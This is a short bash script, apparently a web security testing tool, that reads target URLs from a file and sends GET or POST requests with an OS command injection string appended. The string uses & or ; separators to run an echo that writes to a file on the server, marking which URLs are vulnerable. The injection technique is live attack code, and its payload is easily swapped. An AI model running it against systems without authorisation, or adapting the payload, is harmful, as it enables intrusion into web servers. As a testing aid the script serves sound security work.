#!/bin/bash
        
CURL=/usr/bin/curl
        
# Temporary output file on target web server - ensure that the web  
# application has permission to write to this location
OUTPUTFILE='C:\temp\vulns.txt'
# OUTPUTFILE=/tmp/vulns.txt
        
# A file with URLs to attack, one per line
#   For a GET request, line should be http://:/?=
#   For a POST request, line should be http://:/ 
URLFILE=urls.txt
        
# Command Separator for Windows is & (%26)
# Command Separator for UNIX is ; (%3B)
COMMAND_SEPARATOR=%26
# COMMAND_SEPARATOR=%3B
        
while read LINE
do
	# Get the URL and PARAMETER for POST Requests
        URL=${LINE% *}
        PARAMETER=${LINE#* }
        
        # Base64-encode the LINE such that we can inject it safely 
        # This will help us find the URL that is vulnerable
        LINE_ENCODED=`echo ${LINE} | perl -MMIME::Base64 -lne 'print encode_base64($_)'`
        
        INJECTION_STRING="%20${COMMAND_SEPARATOR}%20echo%20${LINE_ENCODED}%20%3E%3E%20"
        INJECTION_STRING="${INJECTION_STRING}${OUTPUTFILE}%20${COMMAND_SEPARATOR}%20"
        
        if [ "${URL}" != "${LINE}" ]; then
        	# If the LINE read from the URLFILE contains a space, we will get here.
        	# According to our URLFILE format, this indicates a POST request.
        	curl -f -s -F "${PARAMETER}=${INJECTION_STRING}" ${URL} 
        else
        	# If the LINE read from the URLFILE does not contain a space, we will get here.
        	# According to our URLFILE format, this indicates a GET request.
        	curl -f -s "${URL}${INJECTION_STRING}"
        fi
        
        RETCODE=$?
        
        # check to see if curl failed or the server failed
        if [ $RETCODE != 0 ]
        then
        	echo "FAIL: (curl ${RETCODE}) ${LINE}"
        else
        	echo "PASS: (curl ${RETCODE}) ${LINE}"
        fi
done < ${URLFILE}